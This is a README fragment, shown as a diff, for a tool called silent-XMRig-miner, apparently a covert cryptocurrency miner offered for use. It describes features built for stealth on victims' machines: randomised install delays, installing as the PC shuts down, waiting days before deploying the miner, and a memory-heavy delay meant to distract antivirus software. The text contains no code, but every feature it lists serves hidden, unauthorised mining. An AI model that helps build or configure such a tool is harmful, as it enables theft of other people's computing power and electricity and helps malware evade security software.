operationalguy/silent-XMRig-miner/README.md

     2. Zone 2 - from "UTC -6" to "UTC -3" (America east pools)
     3. Zone 3 - from "UTC -2" to "UTC +4" (Europe pools)
     4. Zone 4 - from "UTC +5" to "UTC +12" (Asia pools)
 - Installer delay - delay in milliseconds before installing silent-XMRig-miner.
 Time is selected randomly between Min. and Max. values during install process.
+If both set to 0, waits infinite time and installs the miner when PC is turning off.
 - Delay before deploy miner - Delay in days which silent-XMRig-miner watchdog waits before deploying miner and starting mining operation on the system.
 Time in days is selected randomly between Min. and Max. values
 - Add heavy calculation delay - similar to installer delay, but performs math calculation and a lot of RAM usage(~4GB) for 1 minute, to distract AVs.
 Not recomended as it can crush the installer before it installed anything on low end PCs.
 - Do not mine while on battery - Just stops mining when detects if laptop is on battery.
 Mining is very power intensive task, it will drain battery very fast.